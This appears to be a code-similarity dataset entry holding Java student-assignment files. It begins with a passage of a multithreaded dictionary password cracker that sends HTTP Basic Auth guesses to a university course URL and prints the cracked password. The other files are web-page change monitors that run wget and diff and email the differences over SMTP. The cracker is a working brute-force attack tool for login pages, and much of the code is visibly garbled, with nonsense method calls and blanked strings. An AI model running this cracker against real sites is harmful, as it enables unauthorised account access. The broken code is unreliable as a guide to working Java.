\ void interruptAll(int ID) {\n for (int i=0;i<MAXTHREAD;i++) {\n \
\ if ((threads[i].isAlive()) && (i!=ID)) {\n threads[i].interrupt();\n\
\ }\n notifyAll();\n }\n }\n \n \n \n\
\ public synchronized void setSuccess(int ID, String p) {\n passw \
\ = p;\n success = ID;\n notifyAll();\n interruptAll(ID);\n\
\ \n \n end = System.currentTimeMillis();\n }\n \n\
\ \n public synchronized boolean isSuccess() {\n return (success>=0);\n\
\ }\n \n \n \n public synchronized void waitUntilAllTerminated()\
\ {\n while (curconn>0) {\n try {\n wait();\n\
\ } catch (InterruptedException e) {}\n }\n }\n \n \
\ \n \n \n public synchronized int waitUntilOK2Connect() {\n boolean\
\ interruptd= false;\n int idx = -1;\n \n \n \n \
\ \n while (curconn>=MAXCONN) {\n try {\n \
\ wait();\n } catch (InterruptedException e) { interruptd = true;\
\ }\n }\n \n \n \n if (!interruptd) {\n \
\ \n curconn++;\n for (idx=0;idx<MAXCONN;idx++)\n\
\ if (!connused[idx]) {\n connused[idx] = true;\n\
\ break;\n }\n \n notifyAll();\n\
\ }\n \n \n return idx;\n }\n \n \n public\
\ synchronized void decreaseConn(int idx) {\n curconn--;\n connused[idx]\
\ = false;\n \n \n notifyAll();\n }\n \n \n \n\
\ \n public String[] fetchWords( int idx,int n) {\n String[] result\
\ = new String[n];\n try {\n \n BufferedReader b\
\ = new BufferedReader(new FileReader(TEMPDICT));\n \n for\
\ (int i=0;i<idx;i++) { b.readLine(); }\n \n for (int i=0;i<n;i++)\
\ {\n result[i] = b.readLine();\n }\n \n\
\ b.print();\n } catch (FileNotFoundException e) {\n \
\ System.out.println(e);\n System.exit(0);\n } catch (IOException\
\ e) {}\n return result;\n }\n \n \n public String fetchWord(\
\ int idx) {\n String result = null;\n try {\n \n \
\ BufferedReader b = new BufferedReader(new FileReader(TEMPDICT));\n \
\ \n for (int i=0;i<idx;i++) { b.readLine(); }\n \
\ \n result = b.readLine();\n \n b.print();\n\
\ } catch (FileNotFoundException e) {\n System.out.println(e);\n\
\ System.exit(0);\n } catch (IOException e) {}\n return\
\ result;\n }\n \n \n public static void readThroughDictionary() {\n\
\ try {\n \n BufferedReader b = new BufferedReader(new\
\ FileReader(DICTIONARY));\n PrintWriter w = new PrintWriter(new\
\ BufferedWriter(new FileWriter(TEMPDICT)));\n String s;\n \
\ \n ALLCOMBI = 0;\n while ((s=b.readLine())!=null) {\n\
\ if ((s.length()>=MINCHAR) && (s.length()<=MAXCHAR)) {\n \
\ w.println(s);\n ALLCOMBI++;\n \
\ }\n }\n b.print();\n w.print();\n \
\ } catch (FileNotFoundException e) {\n System.out.println(\"Unable\
\ open the DICTIONARY file '\"+DICTIONARY+\"'\");\n System.exit(0);\n\
\ } catch (IOException e) {\n System.out.println(\"Error in\
\ the DICTIONARY file '\"+DICTIONARY+\"'\");\n System.exit(0);\n \
\ }\n }\n \n \n \n \n \n public class ThCrack extends\
\ Thread {\n \n \n public ThCrack(int threadID, int startidx,\
\ int endidx) {\n super(\" Thread #\"+String.valueOf(threadID)+\":\
\ \");\n this.ID = threadID;\n this.startidx = startidx;\n\
\ this.endidx = endidx;\n \n \n \
\ if (endidx>=startidx+MAXCACHE-1) {\n this.localDict = new String[MAXCACHE];\n\
\ this.localDict = fetchWords(startidx,MAXCACHE);\n \
\ lastFetchIdx = startidx+MAXCACHE-1;\n } else {\n \
\ this.localDict = new String[(int)(endidx-startidx+1)];\n \
\ this.localDict = fetchWords(startidx,(int)(endidx-startidx+1));\n \
\ lastFetchIdx = endidx;\n }\n \n setDaemon(true);\n\
\ }\n \n \n public boolean launchRequest(String ID,\
\ int connID,String thePass) throws IOException, InterruptedException {\n \
\ int i;\n String msg;\n \n \n \
\ URL tryURL = new URL(THEURL);\n \n \n connections[connID]=(HttpURLConnection)\
\ tryURL.openConnection();\n \n \n connections[connID].setRequestProperty(\"\
Authorization\",\" \"+Base64Encode(USERNAME+\":\"+thePass));\n \n \
\ \n i = connections[connID].getResponseCode();\n \
\ msg = connections[connID].getResponseMessage();\n connections[connID].disconnect();\n\
\ \n \n if (i==HttpURLConnection.HTTP_OK) {\n\
\ \n System.out.println(ID+\"Trying '\"+thePass+\"\
' GOTCHA !!! (= \"+String.valueOf()+\"-\"+msg+\").\");\n setSuccess(this.ID,thePass);\n\
\ return (true);\n } else {\n \n \
\ System.out.println(ID+\"Trying '\"+thePass+\"' FAILED (= \"+String.valueOf()+\"\
-\"+msg+\").\");\n return (false);\n }\n }\n\
\ \n \n public void rest(int msec) {\n try { sleep(msec);\
\ } catch (InterruptedException e) {}\n }\n \n \n \
\ public String getCacheIdx(int idx) {\n if (idx<=lastFetchIdx) {\n\
\ return localDict[localDict.length-(int)(lastFetchIdx-idx)-1];\n\
\ } else {\n if (lastFetchIdx+localDict.length-1>endidx)\
\ {\n this.localDict = fetchWords(lastFetchIdx+1,(int)(endidx-lastFetchIdx-1));\n\
\ lastFetchIdx = endidx;\n } else {\n \
\ this.localDict = fetchWords(lastFetchIdx+1,localDict.length);\n\
\ lastFetchIdx = lastFetchIdx+localDict.length;\n \
\ }\n return localDict[localDict.length-(int)(lastFetchIdx-idx)-1];\n\
\ }\n }\n \n \n \n public String\
\ constructPassword(int idx) {\n return getCacheIdx(idx);\n \
\ }\n \n \n public String getStartStr() {\n return\
\ fetchWord(this.startidx);\n }\n \n \n public String\
\ getEndStr() {\n return fetchWord(this.endidx);\n }\n \
\ \n \n public void run() {\n i = startidx;\n \
\ boolean keeprunning = true;\n while ((!isSuccess()) && (i<=endidx)\
\ && (keeprunning)) {\n \n \n int\
\ idx = waitUntilOK2Connect();\n \n \n \
\ if (idx==-1) {\n \n break;\n \
\ }\n \n try {\n \
\ \n String s = constructPassword(i);\n \
\ \n if ((s.length()>=MINCHAR) && (s.length()<=MAXCHAR))\n\
\ launchRequest(getName(), idx, s);\n \
\ else\n System.out.println(getName()+\"skipping '\"\
+s+\"'\");\n \n decreaseConn(idx);\n \
\ \n localattempt++;\n \n\
\ \n rest(MAXCONN);\n \
\ i++;\n } catch (InterruptedException e) {\n \
\ \n \n keeprunning = false;\n \
\ break;\n } catch (IOException e) {\n \
\ \n \n \n \n\
\ \n decreaseConn(idx);\n \
\ }\n }\n \n \n if (success==this.ID)\
\ {\n waitUntilAllTerminated();\n }\n }\n \
\ \n \n public int getLocalAttempt() {\n return localattempt;\n\
\ }\n \n private int startidx,endidx;\n private int\
\ ID;\n private int localattempt = 0;\n private String localDict[];\
\ \n private int lastFetchIdx;\n }\n \n \n public void printProgramHeader(String\
\ mode,int nThread) {\n System.out.println();\n System.out.println(\"\
\ ********************** [ DICTIONARY CRACKING SYSTEM ] *********************\"\
);\n System.out.println();\n System.out.println(\" URL \
\ : \"+THEURL);\n System.out.println(\" Crack Mode : \"+mode);\n \
\ System.out.println(\" . Char : \"+MINCHAR);\n System.out.println(\"\
\ . Char : \"+MAXCHAR);\n System.out.println(\" # of Thread : \"+nThread);\n\
\ System.out.println(\" Connections : \"+MAXCONN);\n System.out.println(\"\
\ All Combi. : \"+ALLCOMBI);\n System.out.println();\n System.out.println(\"\
\ ***************************************************************************\"\
);\n System.out.println();\n }\n \n \n public void startNaiveCracking()\
\ {\n MAXTHREAD = 1;\n MAXCONN = 1;\n startDistCracking();\n\
\ }\n \n \n public void startDistCracking() {\n int startidx,endidx;\n\
\ int thcount;\n \n \n if (isenhanced) {\n \
\ printProgramHeader(\"ENHANCED DICTIONARY CRACKING ALGORITHM\",MAXTHREAD);\n\
\ } else {\n printProgramHeader(\"NAIVE DICTIONARY CRACKING\
\ ALGORITHM\",MAXTHREAD);\n }\n \n \n \n \n\
\ \n \n \n \n if (MAXTHREAD>ALLCOMBI) { MAXTHREAD\
\ = (int) (ALLCOMBI); }\n mult = (ALLCOMBI) / MAXTHREAD;\n \n \
\ \n i = System.currentTimeMillis();\n \n \n \
\ for (thcount=0;thcount<MAXTHREAD-1;thcount++) {\n startidx = thcount*mult;\n\
\ endidx = (thcount+1)*mult-1;\n threads[thcount] = new\
\ ThCrack(thcount, startidx, endidx);\n System.out.println(threads[thcount].getName()+\"\
\ try crack from '\"+threads[thcount].getStartStr()+\"' '\"+threads[thcount].getEndStr()+\"\
'\");\n }\n \n \n \n \n \n startidx\
\ = (MAXTHREAD-1)*mult;\n endidx = ALLCOMBI-1;\n threads[MAXTHREAD-1]\
\ = new ThCrack(MAXTHREAD-1, startidx, endidx);\n System.out.println(threads[MAXTHREAD-1].getName()+\"\
\ try crack from '\"+threads[MAXTHREAD-1].getStartStr()+\"' '\"+threads[MAXTHREAD-1].getEndStr()+\"\
'\");\n \n System.out.println();\n System.out.println(\"\
\ ***************************************************************************\"\
);\n System.out.println();\n \n \n for (int i=0;i<MAXTHREAD;i++)\n\
\ threads[i].print();\n }\n \n \n public Dictionary() {\n\
\ \n if (isenhanced) {\n startDistCracking();\n \
\ } else {\n startNaiveCracking();\n }\n \n \
\ \n reportTimer = new java.util.Timer();\n MyTT tt = new\
\ MyTT();\n reportTimer.schedule(tt,0,1000);\n \n \n \
\ while ((success==-1) && (attempt<ALLCOMBI)) {\n try { Thread.sleep(100);\
\ getAccumulatedLocalAttempt(); } catch (InterruptedException e) { }\n \
\ }\n \n \n if (success==-1) {\n end = System.currentTimeMillis();\n\
\ }\n \n \n getAccumulatedLocalAttempt();\n \
\ \n double ovAps = tt.getOverallAttemptPerSec();\n DecimalFormat\
\ fmt = new DecimalFormat();\n fmt.applyPattern(\"0.00\");\n \n\
\ \n reportTimer.cancel();\n \n \n try { Thread.sleep(1000);\
\ } catch (InterruptedException e) { }\n \n \n synchronized\
\ (this) {\n if (success>=0) {\n System.out.println();\n\
\ System.out.println(\" ********************* [ URL SUCCESSFULLY\
\ CRACKED !! ] *********************\");\n System.out.println();\n\
\ System.out.println(\" The password is : \"+passw);\n \
\ System.out.println(\" Number of attempts : \"+attempt+\" of \"\
+ALLCOMBI+\" total combinations\");\n System.out.println(\" Attempt\
\ position : \"+fmt.format((double)attempt/(double)ALLCOMBI*100)+\"%\");\n\
\ System.out.println(\" Overal attempt rate : \"+fmt.format(ovAps)+\
\ \" attempts/sec\");\n System.out.println(\" Cracking time \
\ : \"+String.valueOf(((double)end-(double)d)/1000) + \" seconds\");\n \
\ System.out.println(\" Worstcase time estd : \"+fmt.format(1/ovAps*ALLCOMBI)+\
\ \" seconds\");\n System.out.println();\n System.out.println(\"\
\ ***************************************************************************\"\
);\n System.out.println();\n } else {\n \
\ System.out.println();\n System.out.println(\" *********************\
\ [ UNABLE CRACK THE URL !!! ] *********************\");\n System.out.println();\n\
\ System.out.println(\" Number of attempts : \"+attempt+\" of\
\ \"+ALLCOMBI+\" total combinations\");\n System.out.println(\"\
\ Attempt position : \"+fmt.format((double)attempt/(double)ALLCOMBI*100)+\"\
%\");\n System.out.println(\" Overal attempt rate : \"+fmt.format(ovAps)+\
\ \" attempts/sec\");\n System.out.println(\" Cracking time \
\ : \"+String.valueOf(((double)end-(double)d)/1000) + \" seconds\");\n \
\ System.out.println();\n System.out.println(\" ***************************************************************************\"\
);\n System.out.println();\n }\n }\n }\n \
\ \n \n public static void printSyntax() {\n System.out.println();\n\
\ System.out.println(\"Syntax : Dictionary [mode] [URL] [] [] [username]\"\
);\n System.out.println();\n System.out.println(\" mode :\
\ (opt) 0 - NAIVE Dictionary mode\");\n System.out.println(\" \
\ (trying from the first the last combinations)\");\n System.out.println(\"\
\ 1 - ENHANCED Dictionary mode\");\n System.out.println(\"\
\ (dividing cracking jobs multiple threads) (default)\"\
);\n System.out.println(\" URL : (opt) the URL crack \");\n \
\ System.out.println(\" (default : http://sec-crack.cs.rmit.edu./SEC/2/index.php)\"\
);\n System.out.println(\" , : (optional) range of characters applied\
\ in the cracking\");\n System.out.println(\" where\
\ 1 <= <= 255 (default = 1)\");\n System.out.println(\" \
\ <= <= 255 (default = 3)\");\n System.out.println(\"\
\ username : (optional) the username that is used crack\");\n System.out.println();\n\
\ System.out.println(\" NOTE: The optional parameters '','', and 'username'\"\
);\n System.out.println(\" have specified altogether none at\
\ all.\");\n System.out.println(\" For example, if [] is specified,\
\ then [], and [username]\");\n System.out.println(\" have specified\
\ as well. If none of them specified,\");\n System.out.println(\" \
\ default values used.\");\n System.out.println();\n System.out.println(\"\
\ Example of invocation :\");\n System.out.println(\" java Dictionary\
\ \");\n System.out.println(\" java Dictionary 0\");\n System.out.println(\"\
\ java Dictionary 1 http://localhost/tryme.php\");\n System.out.println(\"\
\ java Dictionary 0 http://localhost/tryme.php 1 3 \");\n System.out.println(\"\
\ java Dictionary 1 http://localhost/tryme.php 1 10 \");\n System.out.println();\n\
\ System.out.println();\n }\n \n \n public static void paramCheck(String[]\
\ args) {\n int argc = args.length;\n \n \n try {\n\
\ switch (Integer.valueOf(args[0]).intValue()) {\n case\
\ 0: {\n isenhanced = false;\n } break;\n \
\ case 1: {\n isenhanced = true;\n \
\ } break;\n default:\n System.out.println(\"\
Syntax error : invalid mode '\"+args[0]+\"'\");\n printSyntax();\n\
\ System.exit(1);\n }\n } catch (NumberFormatException\
\ e) {\n System.out.println(\"Syntax error : invalid number '\"+args[0]+\"\
'\");\n printSyntax();\n System.exit(1);\n }\n \
\ \n if (argc>1) {\n try {\n \n \
\ URL u = new URL(args[1]);\n \n \n \
\ try {\n HttpURLConnection conn = (HttpURLConnection)\
\ u.openConnection();\n \n switch (conn.getResponseCode())\
\ {\n case HttpURLConnection.HTTP_ACCEPTED:\n \
\ case HttpURLConnection.HTTP_OK:\n case \
\ HttpURLConnection.HTTP_NOT_AUTHORITATIVE:\n case HttpURLConnection.HTTP_FORBIDDEN:\n\
\ case HttpURLConnection.HTTP_UNAUTHORIZED:\n \
\ break;\n default:\n \
\ \n \n System.out.println(\"\
Unable open connection the URL '\"+args[1]+\"'\");\n \
\ System.exit(1);\n }\n } catch (IOException\
\ e) {\n System.out.println(e);\n System.exit(1);\n\
\ }\n \n THEURL = args[1];\n \
\ } catch (MalformedURLException e) {\n \n \
\ System.out.println(\"Invalid URL '\"+args[1]+\"'\");\n printSyntax();\n\
\ System.exit(1);\n }\n }\n \n \
\ \n if (argc==5) {\n try {\n MINCHAR = Integer.valueOf(args[2]).intValue();\n\
\ } catch (NumberFormatException e) {\n System.out.println(\"\
Invalid range number value '\"+args[2]+\"'\");\n printSyntax();\n\
\ System.exit(1);\n }\n \n try\
\ {\n MAXCHAR = Integer.valueOf(args[3]).intValue();\n \
\ } catch (NumberFormatException e) {\n System.out.println(\"\
Invalid range number value '\"+args[3]+\"'\");\n printSyntax();\n\
\ System.exit(1);\n }\n \n if\
\ ((MINCHAR<1) || (MINCHAR>255)) {\n System.out.println(\"Invalid\
\ range number value '\"+args[2]+\"' (must between 0 and 255)\");\n \
\ printSyntax();\n System.exit(1);\n } else\n\
\ if (MINCHAR>MAXCHAR) {\n System.out.println(\"\
Invalid range number value '\"+args[2]+\"' (must lower than the value)\");\n\
\ printSyntax();\n System.exit(1);\n \
\ }\n \n if (MAXCHAR>255) {\n \
\ System.out.println(\"Invalid range number value '\"+args[3]+\"' (must between\
\ value and 255)\");\n printSyntax();\n System.exit(1);\n\
\ }\n \n USERNAME = args[4];\n } else\n\
\ if ((argc>2) && (argc<5)) {\n System.out.println(\"\
Please specify the [], [], and [username] altogether none at all\");\n \
\ printSyntax();\n System.exit(1);\n } else\n\
\ if ((argc>2) && (argc>5)) {\n System.out.println(\"\
The number of parameters expected is not more than 5. \");\n \
\ System.out.println(\" have specified more than 5 parameters.\");\n \
\ printSyntax();\n System.exit(1);\n \
\ }\n }\n \n public static void main(String[] args) {\n MINCHAR\
\ = 1;\n MAXCHAR = 3; \n \n \n if (args.length==0)\
\ {\n args = new String[5];\n args[0] = String.valueOf(1);\
\ \n args[1] = THEURL;\n args[2] = String.valueOf(MINCHAR);\n\
\ args[3] = String.valueOf(MAXCHAR);\n args[4] = USERNAME;\n\
\ }\n \n \n paramCheck(args);\n \n \n\
\ readThroughDictionary();\n \n \n Application = new\
\ Dictionary();\n }\n \n public static Dictionary Application;\n public\
\ static String THEURL\t\t= \"http://sec-crack.cs.rmit.edu./SEC/2/index.php\"\
;\n public static String DICTIONARY = System.getProperty(\"user.dir\"\
)+\"/words\";\n public static String TEMPDICT = System.getProperty(\"\
user.dir\")+\"/~words\";\n public static boolean isenhanced;\t\t\n public\
\ static String passw\t\t= \"\";\t\n \n public static final int REPORT_INTERVAL\
\ = 1; \n public static int MAXTHREAD = 50; \n public static\
\ int MAXCONN = 50; \n public static int\t curconn = 0;\
\ \n public static int success = -1; \n \n public\
\ static String USERNAME = \"\"; \n public static int MINCHAR; \
\ \n public static int MAXCHAR; \n public\
\ static int ALLCOMBI; \n \n public static int start\
\ ,end; \n public static int MAXCACHE = 100; \n \
\ \n public static java.util.Timer reportTimer; \n public static HttpURLConnection\
\ connections[] = new HttpURLConnection[MAXCONN]; \n public static boolean\t\
\ connused[]\t = new boolean[MAXCONN]; \n public ThCrack[]\
\ threads = new ThCrack[MAXTHREAD]; \n public static\
\ int attempt = 0; \n public static int idxLimit;\t\t\
\ \n}\n"
- source_sentence: "\nimport java.net.*;\nimport java.io.*;\nimport java.misc.*;\n\
import java.io.BufferedInputStream;\nimport java.awt.*;\nimport java.awt.event.*;\n\
\npublic class WriteFile\n{\n String url;\n String fileName;\n int flag;\n\
\ private PrintWriter out2;\n private TextArea response;\n int status;\n\
\ int mailFlag;\n\n public WriteFile (String newUrl, String newFileName, int\
\ newFlag)\n {\n url = newUrl;\n fileName = newFileName;\n \
\ PrintWriter printW = null;\n FileOutputStream fout;\n flag = newFlag;\n\
\ status = 0;\n mailFlag = 0;\n\n \n File file = new File(fileName);\n\
\ file.delete();\n\n try\n {\n fout = new FileOutputStream(fileName,true);\n\
\ printW = new PrintWriter(fout);\n }\n catch (IOException\
\ ioe)\n {\n System.out.println(\"IO Error : \" + ioe);\n \
\ }\n\n\n URL u;\n URLConnection uc;\n\n try\n {\n \
\ u = new URL(url);\n try\n {\n \n \
\ uc = u.openConnection();\n\n InputStream content = (InputStream)uc.getInputStream();\n\
\ BufferedReader in = new BufferedReader (new InputStreamReader(content));\n\
\n String line;\n\n \n while ((line = in.readLine())\
\ != null)\n {\n \n printW.println(line);\n\
\n }\n }\n catch (Exception e)\n {\n \
\ System.out.println(\"Error: \" + e);\n }\n }\n \
\ catch (MalformedURLException e)\n {\n System.out.println(url\
\ + \" is not a parseable URL\");\n }\n \n printW.print();\n\
\n\n if(flag == 1)\n {\n \n compareDiff(\"@.rmit.edu.\"\
);\n }\n }\n\n String loadStream(InputStream in) throws IOException\n\
\ {\n int ptr = 0;\n in = new BufferedInputStream(in);\n \
\ StringBuffer buffer = new StringBuffer();\n\n while( (ptr = in.next())\
\ != -1 )\n {\n status++;\n \n buffer.append((char)ptr);\n\
\ mailFlag++;\n \n }\n return buffer.toString();\n\
\ }\n\n public void compareDiff(String emailAdd)\n {\n String cmds\
\ = \"diff test1.txt test2.txt\";\n PrintWriter printW2 = null;\n \
\ FileOutputStream fout2;\n \n File file = new File(\"diff.txt\");\n\
\ file.delete();\n String ;\n\n try\n {\n fout2\
\ = new FileOutputStream(\"diff.txt\",true);\n printW2 = new PrintWriter(fout2);\n\
\ }\n catch (IOException ioe)\n {\n System.out.println(\"\
IO Error : \" + ioe);\n }\n\n try\n {\n\n\n \n \
\ Process ps = Runtime.getRuntime().exec(cmds);\n PrintWriter out\
\ = new PrintWriter(new OutputStreamWriter(ps.getOutputStream()));\n\n \
\ printW2.println(loadStream(ps.getInputStream())+\"\\n\");\n printW2.print();\n\
\n\n if(mailFlag != 0)\n {\n FileReader fRead2;\n\
\ BufferedReader buf2;\n\n try\n {\n \
\ fRead2 = new FileReader(\"diff.txt\");\n buf2 = new\
\ BufferedReader(fRead2);\n String line2;\n int\
\ i=0;\n\n line = new String(\" some changes the web as followed:\
\ \\n\");\n \n Socket s = new Socket(\"wombat.cs.rmit.edu.\"\
, 25);\n out2 = new PrintWriter(s.getOutputStream());\n\n \
\ send(null);\n send(\"HELO cs.rmit.edu.\");\n \
\ send(\"MAIL FROM: @.rmit.edu.\");\n \n \
\ send(\"RCPT : @.rmit.edu.\");\n send(\"DATA\");\n \
\ \n\n while( (line2 = buf2.readLine()) != null)\n \
\ {\n \n line= new String(\"\"+line2+\"\\n\");\n \
\ \n \n\n }\n \
\ \n \n \n out2.print();\n \
\ send(\".\");\n s.print();\n }\n \
\ catch(FileNotFoundException e)\n {\n System.out.println(\"\
File not found\");\n }\n catch(IOException ioe)\n \
\ {\n System.out.println(\"IO Error \" + ioe);\n \
\ }\n }\n\n System.out.println(loadStream(ps.getInputStream()));\n\
\ \n System.err.print(loadStream(ps.getErrorStream()));\n \
\ }\n catch(IOException ioe)\n {\n ioe.printStackTrace();\n\
\ }\n }\n\n public void send(String s) throws IOException\n {\n\
\ \tresponse = new TextArea();\n \tif(s != null)\n \t{\n \
\ response.append(s + \"\\n\");\n out2.println(s);\n\t out2.flush();\n\
\t}\n }\n\n public int getStatus()\n {\n return status;\n }\n}"
sentences:
- "import java.io.*;\nimport java.util.StringTokenizer;\nimport java.net.smtp.SmtpClient;\n\
import java.util.Timer;\nimport java.util.TimerTask;\n\n\npublic class WatchDog\
\ {\npublic static void main(String[] args) {\ntry {\nProcess y = Runtime.getRuntime().exec(\"\
./init\");\n}\ncatch (Exception e) {System.err.println(e);}\n\n\nWatchDog poodle=new\
\ WatchDog();\n {\npoodle.startWatch();\n} while(1==1);\n}\n\npublic void startWatch()\
\ {\nString error_mes=new String();\nString mesg=new String();\nString url=\"\
wget -p http://www.cs.rmit.edu./students\";\n\ntry {\nProcess a = Runtime.getRuntime().exec(url);\n\
}\ncatch (Exception e) {System.err.println(e);}\n\ntry {\nProcess b = Runtime.getRuntime().exec(\"\
diff org/images/ www.cs.rmit.edu./images/\");\n BufferedReader stdInputimages\
\ = new BufferedReader(new InputStreamReader(b.getInputStream()));\n \
\ while ((error_mes = stdInputimages.readLine()) != null) {\n\n \
\ mesg=mesg.concat(error_mes);\n \n \n \
\ }\n}\ncatch (Exception e) {System.err.println(e);}\n\n\n\n\ntry {\nProcess\
\ c = Runtime.getRuntime().exec(\"diff org/students/ www.cs.rmit.edu./students/\"\
);\nBufferedReader stdInputindex = new BufferedReader(new InputStreamReader(c.getInputStream()));\n\
\ while ((error_mes = stdInputindex.readLine()) != null) {\n \
\ mesg=mesg.concat(error_mes);\n \n }\n}\n\
catch (Exception e) {System.err.println(e);}\n\n\nif (mesg.length()>0) { sendEmail(mesg);\
\ }\n\ntry { Thread.sleep(60*60*24*1000);\n } catch(Exception e) { }\n}\n\n\n\n\
\n\npublic void sendEmail(String message) {\n{\nString reciever = \"@cs.rmit.edu.\"\
;\nString sender = \"WATCHDOG@cs.rmit.edu.\";\n\n try {\n\n \
\ SmtpClient smtp = new SmtpClient();\n smtp.from(sender);\n\
\ smtp.to(reciever);\n PrintStream\
\ msg = smtp.startMessage();\n msg.println(message);\n\
\ smtp.closeServer();\n }\n\n \
\ catch (Exception e) {}\n\n }\n}\n}"
- "import java.net.*; \nimport java.io.*; \nimport java.util.regex.*;\nimport java.util.Date;\n\
import java.util.*;\nimport java.text.*; \n\n\n\n\npublic class WatchDog { \n\
\ public static BufferedReader in;\n \n\n public static int LIMITINMINUTES=60*24;\n\
\ public static int TIMELIMIT=LIMITINMINUTES*1000*60;\n public static void main(String[]\
\ args) throws Exception { \n \n String watchedPage = \"http://www.cs.rmit.edu./students/\"\
;\n String currentPage = \"\"; \n \n \n System.out.println(\" stop\
\ the program, press \\\"Alt + C\\\"\");\n \n boolean loggedout=false;\n\
\ while (!loggedout){\n \n currentPage=\"\";\n \n \n \
\ Date date = new Date();\n startTime=date.getTime();\n \n \
\ \n URL cs = new URL(watchedPage); \n HttpURLConnection connection;\n\
\ URLConnection csc = cs.openConnection(); \n try {\n\tBufferedReader\
\ in = new BufferedReader(new InputStreamReader(csc.getInputStream())); \n\tString\
\ inputLine; \n\t\n\twhile ((inputLine = in.readLine()) != null) {\n\t currentPage\
\ = currentPage+inputLine;\n\t}\n\t\n }\n catch (IOException s) { \
\ \n }\n finally {\n\twhile(in!=null)\n in.next();\n \
\ }\n \n String lastPage=readData();\n if (lastPage.trim().equals(currentPage.trim()))\
\ {\n\tSystem.out.println(\"Pages match, nothing email.\");\n }\n else\
\ {\n\t\n\t\n\tString checkCurrentPage = currentPage.trim();\n\tString checkLastPage\
\ = lastPage.trim();\n\tint iterations;\n\t\n\tboolean lastLongestString;\n\t\
if (checkCurrentPage.length()<checkLastPage.length()) {\n iterations\
\ = checkCurrentPage.length();\n\t lastLongestString = true;\n\t}\n\telse {\n\
\ iterations = checkLastPage.length();\n\t lastLongestString = false;\n\
\t \n\t}\n\tString additions = \"Here the additions the : \\n\";\n\tboolean\
\ add=false;\n\tString subtractions = \"Here the parts removed from the : \\\
n\";\n\tboolean sub=false;\n\tfor (int count=0; count<iterations; count++) {\n\
\ \n\t if (checkLastPage.length()>count && checkCurrentPage.length()>count){\n\
\t \n if (checkLastPage.charAt(count)!=(checkCurrentPage.charAt(count)))\
\ {\n\t \n\t \n\t if (count<20){\n\t\tadditions = \"Sorry changes\
\ together distinguish additions and subtractions . Here is where : \"+ checkCurrentPage.substring(count,\
\ checkCurrentPage.length());\n\t\tcount = iterations;\n\t }\n\t else\
\ {\n\t\t\n\t\t\n\t\tcheckCurrentPage= checkCurrentPage.substring(count, checkCurrentPage.length());\n\
\t\tcheckLastPage=checkLastPage.substring(count, checkLastPage.length());\n\t\t\
iterations=iterations-count;\n\t\tcount=0;\n\n\t\t\n\t\t\n\t\t\n\t\tString regexAdd=\"\
\";\n\t\tif (checkLastPage.length()<20){\n\t\t regexAdd=checkLastPage.substring(count,\
\ checkLastPage.length());\n\t\t}\n\t\telse {\t \n\t\t regexAdd=checkLastPage.substring(0,19);\n\
\t\t}\n\t\tString [] changes=checkCurrentPage.split(regexAdd, 2);\n\t\tint changeslength=changes.length;\n\
\t\t\n\t\tif (changeslength>1){\n\t\t \n\t\t add=true;\n\t\t additions = additions\
\ + changes[0];\t \n\t\t \n\t\t \n\t\t if (changeslength>1){\n\t\t checkCurrentPage=regexAdd+changes[1];\n\
\t\t }\n\t\t else {\n\t\t if (lastLongestString==true) \n\t \
\ count=iterations;\n\t\t } \n\t\t}\n\t\telse { \n\t \t\t \n\t\t \n\t\t \
\ \n\t\t String regexSub=\"\";\n\t\t if (checkCurrentPage.length()<20){\n\t\t\
\ regexSub=checkCurrentPage.substring(count, checkCurrentPage.length());\n\t\
\t }\n\t\t else {\t \n\t\t regexSub=checkCurrentPage.substring(0,19);\n\t\
\t }\n\t\t String [] changesSub=checkLastPage.split(regexSub, 2);\n\t\t int\
\ changeslengthSub=changesSub.length;\n\t\t \n\t\t if (changeslengthSub>1){\n\
\t\t \n\t\t sub=true;\n\t\t subtractions = subtractions + changesSub[0];\t\
\ \n\t\t \n\t\t \n\t\t if (changeslengthSub>1){\n\t\t checkLastPage=regexSub+changesSub[1];\n\
\t\t }\n\t\t else {\n\t\t if (lastLongestString==false) \n\t\t \
\ count=iterations;\n\t\t }\n\t\t \n\t\t \n\t\t }\n\t\t}\n\t }\n\
\n } \n\t } \n\t} \n\t\n\t\n\tString emailBody=\"Changes have been\
\ . \\n\"+additions+subtractions;\n\n\t\n\tsendEmail(emailBody);\n }\n\n\
\ \n writeData(currentPage);\n \n \n wait24(startTime);\n\
\ } \n } \n \n \n private static void wait24( int startTime) {\n boolean\
\ waiting=true;\n while(waiting){\n Date endDate = new Date();\n \
\ endTime=endDate.getTime();\n \n \n if (endTime>(TIMELIMIT+startTime)){\n\
\ \n waiting=false;\n }\t\n }\n } \n \n \n public\
\ static String readData() {\n String data;\n String lastPage=\"\";\n \
\ try {\n BufferedReader in = new BufferedReader(new FileReader(\"LastVisitedPage.html\"\
));\n while ((data = in.readLine())!=null) {\n lastPage= lastPage\
\ + data +\"\\n\";\n }\n \n }\n catch (FileNotFoundException e1)\
\ {\n System.exit(0);\n }\n catch (IOException e2) {\n System.out.println(\"\
IO Exception, exiting\");\n System.exit(0);\n }\t \n finally {\n\
\ try {\n\tif (null!=in) {\n in.next();\n\t}\n }\n catch (IOException\
\ e3) {}\n }\n return lastPage;\n }\n \n \n public static void writeData(String\
\ currentPage) {\n PrintWriter out;\n try {\n\tout = new PrintWriter (new\
\ BufferedWriter(new FileWriter(\"LastVisitedPage.html\")));\n\tout.println(currentPage);\n\
\t\n\t\n }\n catch (IllegalArgumentException e1) {\n\tSystem.out.println\
\ (\"Sorry, 't write file. None of changes in this session have been saved\"\
);\n\tSystem.exit(0);\n }\n catch (IOException e2) {\n\tSystem.out.println\
\ (\"Sorry, 't write file. None of changes in this session have been saved\"\
);\n\tSystem.exit(0);\n\t}\n finally {} \n } \n\n \n \n \n public static\
\ void sendEmail(String emailBody){\n \n Socket smtpSocket =null;\n DataOutputStream\
\ os = null;\n InputStreamReader is = null ;\n\n Date dDate = new Date();\n\
\ DateFormat dFormat = DateFormat.getDateInstance(DateFormat.FULL,Locale.US);\n\
\n try{ \n smtpSocket = new Socket(\".rmit.edu.\", 25);\n os = new\
\ DataOutputStream(smtpSocket.getOutputStream());\n is = new InputStreamReader(smtpSocket.getInputStream());\n\
\ BufferedReader = new BufferedReader(is);\n\n if(smtpSocket != null\
\ && os != null && is != null){ \n \n\ttry { \n\t os.writeBytes(\"HELO\
\ .rmit.edu.\\r\\n\");\n\t \n\t \n\t os.writeBytes(\"MAIL From: <@.rmit.edu.>\\\
r\\n\");\n\n\t \n\t os.writeBytes(\"RCPT : <@cs.rmit.edu.>\\r\\n\");\n\n\t \
